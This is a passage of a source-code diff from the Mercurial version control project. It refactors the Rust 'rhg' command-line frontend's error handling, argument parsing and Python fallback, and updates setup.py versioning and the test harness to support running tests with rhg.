CommandErrorKind::StdoutError, - UiError::StderrError(_) => CommandErrorKind::StderrError, + fn from(_error: UiError) -> Self { + // If we already failed writing to stdout or stderr, + // writing an error message to stderr about it would be likely to fail + // too. + CommandError::abort("") + } +} + +impl From<RepoError> for CommandError { + fn from(error: RepoError) -> Self { + match error { + RepoError::NotFound { at } => CommandError::Abort { + message: format_bytes!( + b"abort: repository {} not found", + get_bytes_from_path(at) + ), + detailed_exit_code: exitcode::ABORT, }, + RepoError::ConfigParseError(error) => error.into(), + RepoError::Other(error) => error.into(), + } + } +} + +impl<'a> From<&'a NoRepoInCwdError> for CommandError { + fn from(error: &'a NoRepoInCwdError) -> Self { + let NoRepoInCwdError { cwd } = error; + CommandError::Abort { + message: format_bytes!( + b"abort: no repository found in '{}' (.hg not found)!", + get_bytes_from_path(cwd) + ), + detailed_exit_code: exitcode::ABORT, + } + } +} + +impl From<ConfigError> for CommandError { + fn from(error: ConfigError) -> Self { + match error { + ConfigError::Parse(error) => error.into(), + ConfigError::Other(error) => error.into(), } } } -impl From<FindRootError> for CommandError { - fn from(err: FindRootError) -> Self { - match err.kind { - FindRootErrorKind::RootNotFound(path) => CommandError { - kind: CommandErrorKind::RootNotFound(path), - }, - FindRootErrorKind::GetCurrentDirError(e) => CommandError { - kind: CommandErrorKind::CurrentDirNotFound(e), - }, +impl From<ConfigParseError> for CommandError { + fn from(error: ConfigParseError) -> Self { + let ConfigParseError { + origin, + line, + message, + } = error; + let line_message = if let Some(line_number) = line { + format_bytes!(b":{}", line_number.to_string().into_bytes()) + } else { + Vec::new() + }; + CommandError::Abort { + message: format_bytes!( + b"config error at {}{}: {}", + origin, + line_message, + message + ), + detailed_exit_code: exitcode::CONFIG_ERROR_ABORT, } } } -impl From<RequirementsError> for CommandError { - fn from(err: RequirementsError) -> Self { - CommandError { - kind: CommandErrorKind::RequirementsError(err), +impl From<(RevlogError, &str)> for CommandError { + fn from((err, rev): (RevlogError, &str)) -> CommandError { + match err { + RevlogError::WDirUnsupported => CommandError::abort( + "abort: working directory revision cannot be specified", + ), + RevlogError::InvalidRevision => CommandError::abort(format!( + "abort: invalid revision identifier: {}", + rev + )), + RevlogError::AmbiguousPrefix => CommandError::abort(format!( + "abort: ambiguous revision identifier: {}", + rev + )), + RevlogError::Other(error) => error.into(), } } } + +impl From<StatusError> for CommandError { + fn from(error: StatusError) -> Self { + CommandError::abort(format!("{}", error)) + } +} + +impl From<DirstateMapError> for CommandError { + fn from(error: DirstateMapError) -> Self { + CommandError::abort(format!("{}", error)) + } +} + +impl From<DirstateError> for CommandError { + fn from(error: DirstateError) -> Self { + match error { + DirstateError::Common(error) => error.into(), + DirstateError::Map(error) => error.into(), + } + } +} diff --git a/rust/rhg/src/exitcode.rs b/rust/rhg/src/exitcode.rs --- a/rust/rhg/src/exitcode.rs +++ b/rust/rhg/src/exitcode.rs @@ -6,5 +6,11 @@ /// Generic abort pub const ABORT: ExitCode = 255; -/// Command not implemented by rhg -pub const UNIMPLEMENTED_COMMAND: ExitCode = 252; +// Abort when there is a config related error +pub const CONFIG_ERROR_ABORT: ExitCode = 30; + +/// Generic something completed but did not succeed +pub const UNSUCCESSFUL: ExitCode = 1; + +/// Command or feature not implemented by rhg +pub const UNIMPLEMENTED: ExitCode = 252; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -1,185 +1,509 @@ extern crate log; +use crate::ui::Ui; use clap::App; use clap::AppSettings; use clap::Arg; -use clap::ArgGroup; use clap::ArgMatches; -use clap::SubCommand; -use hg::operations::DebugDataKind; -use std::convert::TryFrom; +use format_bytes::{format_bytes, join}; +use hg::config::Config; +use hg::repo::{Repo, RepoError}; +use hg::utils::files::{get_bytes_from_os_str, get_path_from_bytes}; +use hg::utils::SliceExt; +use std::ffi::OsString; +use std::path::PathBuf; +use std::process::Command; -mod commands; +mod blackbox; mod error; mod exitcode; mod ui; -use commands::Command; use error::CommandError; -fn main() { - env_logger::init(); +fn main_with_result( + process_start_time: &blackbox::ProcessStartTime, + ui: &ui::Ui, + repo: Result<&Repo, &NoRepoInCwdError>, + config: &Config, +) -> Result<(), CommandError> { + check_extensions(config)?; + let app = App::new("rhg") - .setting(AppSettings::AllowInvalidUtf8) + .global_setting(AppSettings::AllowInvalidUtf8) + .global_setting(AppSettings::DisableVersion) .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) - .version("0.0.1") - .subcommand( - SubCommand::with_name("root").about(commands::root::HELP_TEXT), - ) - .subcommand( - SubCommand::with_name("files") - .arg( - Arg::with_name("rev") - .help("search the repository as it is in REV") - .short("-r") - .long("--revision") - .value_name("REV") - .takes_value(true), - ) - .about(commands::files::HELP_TEXT), + .arg( + Arg::with_name("repository") + .help("repository root directory") + .short("-R") + .long("--repository") + .value_name("REPO") + .takes_value(true) + // Both ok: `hg -R ./foo log` or `hg log -R ./foo` + .global(true), ) - .subcommand( - SubCommand::with_name("cat") - .arg( - Arg::with_name("rev") - .help("search the repository as it is in REV") - .short("-r") - .long("--revision") - .value_name("REV") - .takes_value(true), - ) - .arg( - clap::Arg::with_name("files") - .required(true) - .multiple(true) - .empty_values(false) - .value_name("FILE") - .help("Activity to start: activity@category"), - ) - .about(commands::cat::HELP_TEXT), + .arg( + Arg::with_name("config") + .help("set/override config option (use 'section.name=value')") + .long("--config") + .value_name("CONFIG") + .takes_value(true) + .global(true) + // Ok: `--config section.key1=val --config section.key2=val2` + .multiple(true) + // Not ok: `--config section.key1=val section.key2=val2` + .number_of_values(1), + ) + .arg( + Arg::with_name("cwd") + .help("change working directory") + .long("--cwd") + .value_name("DIR") + .takes_value(true) + .global(true), ) - .subcommand( - SubCommand::with_name("debugdata") - .about(commands::debugdata::HELP_TEXT) - .arg( - Arg::with_name("changelog") - .help("open changelog") - .short("-c") - .long("--changelog"), - ) - .arg( - Arg::with_name("manifest") - .help("open manifest") - .short("-m") - .long("--manifest"), + .version("0.0.1"); + let app = add_subcommand_args(app); + + let matches = app.clone().get_matches_safe()?; + + let (subcommand_name, subcommand_matches) = matches.subcommand(); + let run = subcommand_run_fn(subcommand_name) + .expect("unknown subcommand name from clap despite AppSettings::SubcommandRequired"); + let subcommand_args = subcommand_matches + .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); + + let invocation = CliInvocation { + ui, + subcommand_args, + config, + repo, + }; + let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?; + blackbox.log_command_start(); + let result = run(&invocation); + blackbox.log_command_end(exit_code( + &result, + // TODO: show a warning or combine with original error if `get_bool` + // returns an error + config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + )); + result +} + +fn main() { + // Run this first, before we find out if the blackbox extension is even + // enabled, in order to include everything in-between in the duration + // measurements. Reading config files can be slow if they’re on NFS. + let process_start_time = blackbox::ProcessStartTime::now(); + + env_logger::init(); + let ui = ui::Ui::new(); + + let early_args = EarlyArgs::parse(std::env::args_os()); + + let initial_current_dir = early_args.cwd.map(|cwd| { + let cwd = get_path_from_bytes(&cwd); + std::env::current_dir() + .and_then(|initial| { + std::env::set_current_dir(cwd)?; + Ok(initial) + }) + .unwrap_or_else(|error| { + exit( + &None, + &ui, + OnUnsupported::Abort, + Err(CommandError::abort(format!( + "abort: {}: '{}'", + error, + cwd.display() + ))), + false, ) - .group( - ArgGroup::with_name("") - .args(&["changelog", "manifest"]) - .required(true), - ) - .arg( - Arg::with_name("rev") - .help("revision") - .required(true) - .value_name("REV"), - ), - ) - .subcommand( - SubCommand::with_name("debugrequirements") - .about(commands::debugrequirements::HELP_TEXT), - ); - - let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { - let _ = ui::Ui::new().writeln_stderr_str(&err.message); - std::process::exit(exitcode::UNIMPLEMENTED_COMMAND) + }) }); - let ui = ui::Ui::new(); + let non_repo_config = + Config::load(early_args.config).unwrap_or_else(|error| { + // Normally this is decided based on config, but we don’t have that + // available. As of this writing config loading never returns an + // "unsupported" error but that is not enforced by the type system. + let on_unsupported = OnUnsupported::Abort; - let command_result = match_subcommand(matches, &ui); + exit( + &initial_current_dir, + &ui, + on_unsupported, + Err(error.into()), + false, + ) + }); - match command_result { - Ok(_) => std::process::exit(exitcode::OK), - Err(e) => { - let message = e.get_error_message_bytes(); - if let Some(msg) = message { - match ui.write_stderr(&msg) { - Ok(_) => (), - Err(_) => std::process::exit(exitcode::ABORT), - }; - }; - e.exit() + if let Some(repo_path_bytes) = &early_args.repo { + lazy_static::lazy_static! { + static ref SCHEME_RE: regex::bytes::Regex = + // Same as `_matchscheme` in `mercurial/util.py` + regex::bytes::Regex::new("^[a-zA-Z0-9+.\\-]+:").unwrap(); + } + if SCHEME_RE.is_match(&repo_path_bytes) { + exit( + &initial_current_dir, + &ui, + OnUnsupported::from_config(&ui, &non_repo_config), + Err(CommandError::UnsupportedFeature { + message: format_bytes!( + b"URL-like --repository {}", + repo_path_bytes + ), + }), + // TODO: show a warning or combine with original error if + // `get_bool` returns an error + non_repo_config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + ) + } + } + let repo_path = early_args.repo.as_deref().map(get_path_from_bytes); + let repo_result = match Repo::find(&non_repo_config, repo_path) { + Ok(repo) => Ok(repo), + Err(RepoError::NotFound { at }) if repo_path.is_none() => { + // Not finding a repo is not fatal yet, if `-R` was not given + Err(NoRepoInCwdError { cwd: at }) + } + Err(error) => exit( + &initial_current_dir, + &ui, + OnUnsupported::from_config(&ui, &non_repo_config), + Err(error.into()), + // TODO: show a warning or combine with original error if + // `get_bool` returns an error + non_repo_config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + ), + }; + + let config = if let Ok(repo) = &repo_result { + repo.config() + } else { + &non_repo_config + }; + let on_unsupported = OnUnsupported::from_config(&ui, config); + + let result = main_with_result( + &process_start_time, + &ui, + repo_result.as_ref(), + config, + ); + exit( + &initial_current_dir, + &ui, + on_unsupported, + result, + // TODO: show a warning or combine with original error if `get_bool` + // returns an error + config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + ) +} + +fn exit_code( + result: &Result<(), CommandError>, + use_detailed_exit_code: bool, +) -> i32 { + match result { + Ok(()) => exitcode::OK, + Err(CommandError::Abort { + message: _, + detailed_exit_code, + }) => { + if use_detailed_exit_code { + *detailed_exit_code + } else { + exitcode::ABORT + } + } + Err(CommandError::Unsuccessful) => exitcode::UNSUCCESSFUL, + + // Exit with a specific code and no error message to let a potential + // wrapper script fallback to Python-based Mercurial. + Err(CommandError::UnsupportedFeature { .. }) => { + exitcode::UNIMPLEMENTED } } } -fn match_subcommand( - matches: ArgMatches, - ui: &ui::Ui, -) -> Result<(), CommandError> { - match matches.subcommand() { - ("root", _) => commands::root::RootCommand::new().run(&ui), - ("files", Some(matches)) => { - commands::files::FilesCommand::try_from(matches)?.run(&ui) +fn exit( + initial_current_dir: &Option<PathBuf>, + ui: &Ui, + mut on_unsupported: OnUnsupported, + result: Result<(), CommandError>, + use_detailed_exit_code: bool, +) -> ! { + if let ( + OnUnsupported::Fallback { executable }, + Err(CommandError::UnsupportedFeature { .. }), + ) = (&on_unsupported, &result) + { + let mut args = std::env::args_os(); + let executable_path = get_path_from_bytes(&executable); + let this_executable = args.next().expect("exepcted argv[0] to exist"); + if executable_path == &PathBuf::from(this_executable) { + // Avoid spawning infinitely many processes until resource + // exhaustion. + let _ = ui.write_stderr(&format_bytes!( + b"Blocking recursive fallback. The 'rhg.fallback-executable = {}' config \ + points to `rhg` itself.\n", + executable + )); + on_unsupported = OnUnsupported::Abort + } else { + // `args` is now `argv[1..]` since we’ve already consumed `argv[0]` + let mut command = Command::new(executable_path); + command.args(args); + if let Some(initial) = initial_current_dir { + command.current_dir(initial); + } + let result = command.status(); + match result { + Ok(status) => std::process::exit( + status.code().unwrap_or(exitcode::ABORT), + ), + Err(error) => { + let _ = ui.write_stderr(&format_bytes!( + b"tried to fall back to a '{}' sub-process but got error {}\n", + executable, format_bytes::Utf8(error) + )); + on_unsupported = OnUnsupported::Abort + } + } } - ("cat", Some(matches)) => { - commands::cat::CatCommand::try_from(matches)?.run(&ui) - } - ("debugdata", Some(matches)) => { - commands::debugdata::DebugDataCommand::try_from(matches)?.run(&ui) + } + exit_no_fallback(ui, on_unsupported, result, use_detailed_exit_code) +} + +fn exit_no_fallback( + ui: &Ui, + on_unsupported: OnUnsupported, + result: Result<(), CommandError>, + use_detailed_exit_code: bool, +) -> ! { + match &result { + Ok(_) => {} + Err(CommandError::Unsuccessful) => {} + Err(CommandError::Abort { + message, + detailed_exit_code: _, + }) => { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. + let _ = ui.write_stderr(&format_bytes!(b"{}\n", message)); + } } - ("debugrequirements", _) => { - commands::debugrequirements::DebugRequirementsCommand::new() - .run(&ui) + Err(CommandError::UnsupportedFeature { message }) => { + match on_unsupported { + OnUnsupported::Abort => { + let _ = ui.write_stderr(&format_bytes!( + b"unsupported feature: {}\n", + message + )); + } + OnUnsupported::AbortSilent => {} + OnUnsupported::Fallback { .. } => unreachable!(), + } } - _ => unreachable!(), // Because of AppSettings::SubcommandRequired, } + std::process::exit(exit_code(&result, use_detailed_exit_code)) } -impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::files::FilesCommand<'a> { - type Error = CommandError; +macro_rules! subcommands { + ($( $command: ident )+) => { + mod commands { + $( + pub mod $command; + )+ + } + + fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> { + app + $( + .subcommand(commands::$command::args()) + )+ + } + + pub type RunFn = fn(&CliInvocation) -> Result<(), CommandError>; + + fn subcommand_run_fn(name: &str) -> Option<RunFn> { + match name { + $( + stringify!($command) => Some(commands::$command::run), + )+ + _ => None, + } + } + }; +} + +subcommands! { + cat + debugdata + debugrequirements + files + root + config + status +} + +pub struct CliInvocation<'a> { + ui: &'a Ui, + subcommand_args: &'a ArgMatches<'a>, + config: &'a Config, + /// References inside `Result` is a bit peculiar but allow + /// `invocation.repo?` to work out with `&CliInvocation` since this + /// `Result` type is `Copy`. + repo: Result<&'a Repo, &'a NoRepoInCwdError>, +} + +struct NoRepoInCwdError { + cwd: PathBuf, +} - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args.value_of("rev"); - Ok(commands::files::FilesCommand::new(rev)) +/// CLI arguments to be parsed "early" in order to be able to read +/// configuration before using Clap. Ideally we would also use Clap for this, +/// see <https://github.com/clap-rs/clap/discussions/2366>. +/// +/// These arguments are still declared when we do use Clap later, so that Clap +/// does not return an error for their presence. +struct EarlyArgs { + /// Values of all `--config` arguments. (Possibly none) + config: Vec<Vec<u8>>, + /// Value of the `-R` or `--repository` argument, if any. + repo: Option<Vec<u8>>, + /// Value of the `--cwd` argument, if any. + cwd: Option<Vec<u8>>, +} + +impl EarlyArgs { + fn parse(args: impl IntoIterator<Item = OsString>) -> Self { + let mut args = args.into_iter().map(get_bytes_from_os_str); + let mut config = Vec::new(); + let mut repo = None; + let mut cwd = None; + // Use `while let` instead of `for` so that we can also call + // `args.next()` inside the loop. + while let Some(arg) = args.next() { + if arg == b"--config" { + if let Some(value) = args.next() { + config.push(value) + } + } else if let Some(value) = arg.drop_prefix(b"--config=") { + config.push(value.to_owned()) + } + + if arg == b"--cwd" { + if let Some(value) = args.next() { + cwd = Some(value) + } + } else if let Some(value) = arg.drop_prefix(b"--cwd=") { + cwd = Some(value.to_owned()) + } + + if arg == b"--repository" || arg == b"-R" { + if let Some(value) = args.next() { + repo = Some(value) + } + } else if let Some(value) = arg.drop_prefix(b"--repository=") { + repo = Some(value.to_owned()) + } else if let Some(value) = arg.drop_prefix(b"-R") { + repo = Some(value.to_owned()) + } + } + Self { config, repo, cwd } } } -impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::cat::CatCommand<'a> { - type Error = CommandError; +/// What to do when encountering some unsupported feature. +/// +/// See `HgError::UnsupportedFeature` and `CommandError::UnsupportedFeature`. +enum OnUnsupported { + /// Print an error message describing what feature is not supported, + /// and exit with code 252. + Abort, + /// Silently exit with code 252. + AbortSilent, + /// Try running a Python implementation + Fallback { executable: Vec<u8> }, +} + +impl OnUnsupported { + const DEFAULT: Self = OnUnsupported::Abort; - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args.value_of("rev"); - let files = match args.values_of("files") { - Some(files) => files.collect(), - None => vec![], - }; - Ok(commands::cat::CatCommand::new(rev, files)) + fn from_config(ui: &Ui, config: &Config) -> Self { + match config + .get(b"rhg", b"on-unsupported") + .map(|value| value.to_ascii_lowercase()) + .as_deref() + { + Some(b"abort") => OnUnsupported::Abort, + Some(b"abort-silent") => OnUnsupported::AbortSilent, + Some(b"fallback") => OnUnsupported::Fallback { + executable: config + .get(b"rhg", b"fallback-executable") + .unwrap_or_else(|| { + exit_no_fallback( + ui, + Self::Abort, + Err(CommandError::abort( + "abort: 'rhg.on-unsupported=fallback' without \ + 'rhg.fallback-executable' set." + )), + false, + ) + }) + .to_owned(), + }, + None => Self::DEFAULT, + Some(_) => { + // TODO: warn about unknown config value + Self::DEFAULT + } + } } } -impl<'a> TryFrom<&'a ArgMatches<'_>> - for commands::debugdata::DebugDataCommand<'a> -{ - type Error = CommandError; +const SUPPORTED_EXTENSIONS: &[&[u8]] = &[b"blackbox", b"share"]; + +fn check_extensions(config: &Config) -> Result<(), CommandError> { + let enabled = config.get_section_keys(b"extensions"); + + let mut unsupported = enabled; + for supported in SUPPORTED_EXTENSIONS { + unsupported.remove(supported); + } - fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> { - let rev = args - .value_of("rev") - .expect("rev should be a required argument"); - let kind = match ( - args.is_present("changelog"), - args.is_present("manifest"), - ) { - (true, false) => DebugDataKind::Changelog, - (false, true) => DebugDataKind::Manifest, - (true, true) => { - unreachable!("Should not happen since options are exclusive") - } - (false, false) => { - unreachable!("Should not happen since options are required") - } - }; - Ok(commands::debugdata::DebugDataCommand::new(rev, kind)) + if let Some(ignored_list) = + config.get_simple_list(b"rhg", b"ignored-extensions") + { + for ignored in ignored_list { + unsupported.remove(ignored); + } + } + + if unsupported.is_empty() { + Ok(()) + } else { + Err(CommandError::UnsupportedFeature { + message: format_bytes!( + b"extensions: {} (consider adding them to 'rhg.ignored-extensions' config)", + join(unsupported, b", ") + ), + }) } } diff --git a/rust/rhg/src/ui.rs b/rust/rhg/src/ui.rs --- a/rust/rhg/src/ui.rs +++ b/rust/rhg/src/ui.rs @@ -49,11 +49,6 @@ stderr.flush().or_else(handle_stderr_error) } - - /// Write string line to stderr - pub fn writeln_stderr_str(&self, s: &str) -> Result<(), UiError> { - self.write_stderr(&format!("{}\n", s).as_bytes()) - } } /// A buffered stdout writer for faster batch printing operations. diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -419,9 +419,9 @@ ltag = sysstr(hg.run(ltagcmd)) changessincecmd = ['log', '-T', 'x\n', '-r', "only(.,'%s')" % ltag] changessince = len(hg.run(changessincecmd).splitlines()) - version = '%s+%s-%s' % (ltag, changessince, hgid) + version = '%s+hg%s.%s' % (ltag, changessince, hgid) if version.endswith('+'): - version += time.strftime('%Y%m%d') + version = version[:-1] + 'local' + time.strftime('%Y%m%d') elif os.path.exists('.hg_archival.txt'): kw = dict( [[t.strip() for t in l.split(':', 1)] for l in open('.hg_archival.txt')] @@ -430,11 +430,13 @@ version = kw['tag'] elif 'latesttag' in kw: if 'changessincelatesttag' in kw: - version = '%(latesttag)s+%(changessincelatesttag)s-%(node).12s' % kw + version = ( + '%(latesttag)s+hg%(changessincelatesttag)s.%(node).12s' % kw + ) else: - version = '%(latesttag)s+%(latesttagdistance)s-%(node).12s' % kw + version = '%(latesttag)s+hg%(latesttagdistance)s.%(node).12s' % kw else: - version = kw.get('node', '')[:12] + version = '0+hg' + kw.get('node', '')[:12] if version: versionb = version @@ -451,20 +453,6 @@ ), ) -try: - oldpolicy = os.environ.get('HGMODULEPOLICY', None) - os.environ['HGMODULEPOLICY'] = 'py' - from mercurial import __version__ - - version = __version__.version -except ImportError: - version = b'unknown' -finally: - if oldpolicy is None: - del os.environ['HGMODULEPOLICY'] - else: - os.environ['HGMODULEPOLICY'] = oldpolicy - class hgbuild(build): # Insert hgbuildmo first so that files in mercurial/locale/ are found @@ -609,6 +597,12 @@ # and its build is not explictely disabled (for external build # as Linux distributions would do) if self.distribution.rust and self.rust: + if not sys.platform.startswith('linux'): + self.warn( + "rust extensions have only been tested on Linux " + "and may not behave correctly on other platforms" + ) + for rustext in ruststandalones: rustext.build('' if self.inplace else self.build_lib) @@ -823,6 +817,22 @@ if not os.path.exists(dest): shutil.copy(buf.value, dest) + # Also overwrite python3.dll so that hgext.git is usable. + # TODO: also handle the MSYS flavor + if sys.version_info[0] >= 3: + python_x = os.path.join( + os.path.dirname(fsdecode(buf.value)), + "python3.dll", + ) + + if os.path.exists(python_x): + dest = os.path.join( + os.path.dirname(self.hgtarget), + os.path.basename(python_x), + ) + + shutil.copy(python_x, dest) + if not pythonlib: log.warn( 'could not determine Python DLL filename; assuming pythonXY' @@ -1677,8 +1687,8 @@ # unicode on Python 2 still works because it won't contain any # non-ascii bytes and will be implicitly converted back to bytes # when operated on. -assert isinstance(version, bytes) -setupversion = version.decode('ascii') +assert isinstance(version, str) +setupversion = version extra = {} @@ -1706,7 +1716,7 @@ extra['console'] = [ { 'script': 'hg', - 'copyright': 'Copyright (C) 2005-2021 Matt Mackall and others', + 'copyright': 'Copyright (C) 2005-2021 Olivia Mackall and others', 'product_version': version, } ] @@ -1782,7 +1792,7 @@ setup( name='mercurial', version=setupversion, - author='Matt Mackall and many others', + author='Olivia Mackall and many others', author_email='mercurial@mercurial-scm.org', url='https://mercurial-scm.org/', download_url='https://mercurial-scm.org/release/', diff --git a/tests/common-pattern.py b/tests/common-pattern.py --- a/tests/common-pattern.py +++ b/tests/common-pattern.py @@ -20,7 +20,6 @@ br'phases%253Dheads%250A' br'pushkey%250A' br'remote-changegroup%253Dhttp%252Chttps%250A' - br'rev-branch-cache%250A' br'stream%253Dv2', # (the replacement patterns) br'$USUAL_BUNDLE_CAPS$', @@ -53,7 +52,6 @@ br'phases%3Dheads%0A' br'pushkey%0A' br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache%0A' br'stream%3Dv2', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS$', @@ -70,8 +68,7 @@ br'listkeys%0A' br'phases%3Dheads%0A' br'pushkey%0A' - br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache', + br'remote-changegroup%3Dhttp%2Chttps', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS_SERVER$', ), @@ -85,7 +82,6 @@ br'listkeys%0A' br'pushkey%0A' br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache%0A' br'stream%3Dv2', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS_NO_PHASES$', diff --git a/tests/flagprocessorext.py b/tests/flagprocessorext.py --- a/tests/flagprocessorext.py +++ b/tests/flagprocessorext.py @@ -31,28 +31,28 @@ return False -def noopdonothing(self, text, sidedata): +def noopdonothing(self, text): return (text, True) def noopdonothingread(self, text): - return (text, True, {}) + return (text, True) -def b64encode(self, text, sidedata): +def b64encode(self, text): return (base64.b64encode(text), False) def b64decode(self, text): - return (base64.b64decode(text), True, {}) + return (base64.b64decode(text), True) -def gzipcompress(self, text, sidedata): +def gzipcompress(self, text): return (zlib.compress(text), False) def gzipdecompress(self, text): - return (zlib.decompress(text), True, {}) + return (zlib.decompress(text), True) def supportedoutgoingversions(orig, repo): diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -140,9 +140,22 @@ """Return the match object if cmd executes successfully and its output is matched by the supplied regular expression. """ + + # Tests on Windows have to fake USERPROFILE to point to the test area so + # that `~` is properly expanded on py3.8+. However, some tools like black + # make calls that need the real USERPROFILE in order to run `foo --version`. + env = os.environ + if os.name == 'nt': + env = os.environ.copy() + env['USERPROFILE'] = env['REALUSERPROFILE'] + r = re.compile(regexp) p = subprocess.Popen( - cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT + cmd, + shell=True, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + env=env, ) s = p.communicate()[0] ret = p.returncode @@ -188,6 +201,11 @@ return 'CHGHG' in os.environ +@check("rhg", "running with rhg as 'hg'") +def has_rhg(): + return 'RHG_INSTALLED_AS_HG' in os.environ + + @check("cvs", "cvs client/server") def has_cvs(): re = br'Concurrent Versions System.*?server' @@ -591,7 +609,7 @@ return matchoutput("pylint --help", br"Usage:[ ]+pylint", True) -@check("clang-format", "clang-format C code formatter") +@check("clang-format", "clang-format C code formatter (>= 11)") def has_clang_format(): m = matchoutput('clang-format --version', br'clang-format version (\d+)') # style changed somewhere between 10.x and 11.x @@ -702,6 +720,12 @@ return os.path.isdir(os.path.join(t, "..", ".hg")) +@check("network-io", "whether tests are allowed to access 3rd party services") +def has_test_repo(): + t = os.environ.get("HGTESTS_ALLOW_NETIO") + return t == "1" + + @check("curses", "terminfo compiler and curses module") def has_curses(): try: @@ -1034,7 +1058,7 @@ return matchoutput('sqlite3 -version', br'^3\.\d+') -@check('vcr', 'vcr http mocking library') +@check('vcr', 'vcr http mocking library (pytest-vcr)') def has_vcr(): try: import vcr @@ -1054,7 +1078,7 @@ return matchoutput('emacs --version', b'GNU Emacs 2(4.4|4.5|5|6|7|8|9)') -@check('black', 'the black formatter for python') +@check('black', 'the black formatter for python (>= 20.8b1)') def has_black(): blackcmd = 'black --version' version_regex = b'black, version ([0-9a-b.]+)' diff --git a/tests/logexceptions.py b/tests/logexceptions.py --- a/tests/logexceptions.py +++ b/tests/logexceptions.py @@ -1,6 +1,6 @@ # logexceptions.py - Write files containing info about Mercurial exceptions # -# Copyright 2017 Matt Mackall <mpm@selenic.com> +# Copyright 2017 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/tests/remotefilelog-getflogheads.py b/tests/remotefilelog-getflogheads.py --- a/tests/remotefilelog-getflogheads.py +++ b/tests/remotefilelog-getflogheads.py @@ -5,6 +5,9 @@ hg, registrar, ) +from mercurial.utils import ( + urlutil, +) cmdtable = {} command = registrar.command(cmdtable) @@ -18,10 +21,13 @@ Used for testing purpose """ - dest = repo.ui.expandpath(b'default') + dest = urlutil.get_unique_pull_path(b'getflogheads', repo, ui)[0] peer = hg.peer(repo, {}, dest) - flogheads = peer.x_rfl_getflogheads(path) + try: + flogheads = peer.x_rfl_getflogheads(path) + finally: + peer.close() if flogheads: for head in flogheads: diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -2,7 +2,7 @@ # # run-tests.py - Run a set of tests on Mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -301,6 +301,7 @@ while time.time() - start < timeout and p.returncode is None: time.sleep(0.1) p.timeout = True + vlog('# Timout reached for process %d' % p.pid) if p.returncode is None: terminate(p) @@ -540,6 +541,11 @@ action="store_true", help="show chg debug logs", ) + hgconf.add_argument( + "--rhg", + action="store_true", + help="install and use rhg Rust implementation in place of hg", + ) hgconf.add_argument("--compiler", help="compiler to build with") hgconf.add_argument( '--extra-config-opt', @@ -552,6 +558,7 @@ "--local", action="store_true", help="shortcut for --with-hg=<testdir>/../hg, " + "--with-rhg=<testdir>/../rust/target/release/rhg if --rhg is set, " "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set", ) hgconf.add_argument( @@ -580,6 +587,11 @@ help="use specified chg wrapper in place of hg", ) hgconf.add_argument( + "--with-rhg", + metavar="RHG", + help="use specified rhg Rust implementation in place of hg", + ) + hgconf.add_argument( "--with-hg", metavar="HG", help="test using specified hg script rather than a " @@ -667,13 +679,17 @@ parser.error('--rust cannot be used with --no-rust') if options.local: - if options.with_hg or options.with_chg: - parser.error('--local cannot be used with --with-hg or --with-chg') + if options.with_hg or options.with_rhg or options.with_chg: + parser.error( + '--local cannot be used with --with-hg or --with-rhg or --with-chg' + ) testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0]))) reporootdir = os.path.dirname(testdir) pathandattrs = [(b'hg', 'with_hg')] if options.chg: pathandattrs.append((b'contrib/chg/chg', 'with_chg')) + if options.rhg: + pathandattrs.append((b'rust/target/release/rhg', 'with_rhg')) for relpath, attr in pathandattrs: binpath = os.path.join(reporootdir, relpath) if os.name != 'nt' and not os.access(binpath, os.X_OK): @@ -696,6 +712,8 @@ if (options.chg or options.with_chg) and os.name == 'nt': parser.error('chg does not work on %s' % os.name) + if (options.rhg or options.with_rhg) and os.name == 'nt': + parser.error('rhg does not work on %s' % os.name) if options.with_chg: options.chg = False # no installation to temporary location options.with_chg = canonpath(_sys2bytes(options.with_chg)) @@ -704,12 +722,28 @@ and os.access(options.with_chg, os.X_OK) ): parser.error('--with-chg must specify a chg executable') + if options.with_rhg: + options.rhg = False # no installation to temporary location + options.with_rhg = canonpath(_sys2bytes(options.with_rhg)) + if not ( + os.path.isfile(options.with_rhg) + and os.access(options.with_rhg, os.X_OK) + ): + parser.error('--with-rhg must specify a rhg executable') if options.chg and options.with_hg: # chg shares installation location with hg parser.error( '--chg does not work when --with-hg is specified ' '(use --with-chg instead)' ) + if options.rhg and options.with_hg: + # rhg shares installation location with hg + parser.error( + '--rhg does not work when --with-hg is specified ' + '(use 